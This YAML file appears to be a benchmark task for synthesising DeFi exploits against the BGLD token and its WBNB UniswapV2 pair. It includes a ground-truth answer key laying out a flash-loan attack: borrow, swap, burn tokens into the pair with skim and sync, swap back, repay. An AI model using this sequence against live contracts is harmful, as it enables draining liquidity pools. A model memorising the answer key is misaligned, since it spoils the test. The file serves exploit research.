project_name: "BGLD"

# Abstract name of a DeFi contract and its class name.
ctrt_name2cls:
  - ["bgld", "BGLD"]
  - ["wbnb", "WBNB"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

# For contract deployment
ctrt_name2deploy:
  - ["bgld", "new BGLD()"]
  - ["wbnb", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function burn_bgld_pair(uint256 amount) internal eurus {
    bgld.transfer(address(pair), amount);
    pair.skim(attacker);
    pair.sync();
    }"

extra_deployments_before:
  - "bgld.mint(100e18);"

extra_deployments: []

extra_statements: []

attack_goal_str: "wbnb"

groundtruth:
  - ["borrow", "wbnb", "owner", "125e18"]
  - ["swap", "pair", "attacker", "wbnb", "bgld", "wbnb.balanceOf(attacker)", "pair.getAmountOut(wbnb.balanceOf(attacker), address(wbnb)) * 9 / 10"]
  - ["burn", "bgld", "pair", "bgld.balanceOf(address(pair)) * 10"]
  - ["swap", "pair", "attacker", "bgld", "wbnb", "100 * 1e6", "pair.getAmountOut(100 * 1e6, address(bgld))"]
  - ["payback", "wbnb", "owner", "125e18 * 1003 / 1000"]

roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "bgld":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["wbnb", "bgld"]
    support_swaps:
      "wbnb": ["wbnb", "bgld"]
      "bgld": ["wbnb", "bgld"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Token Burn"
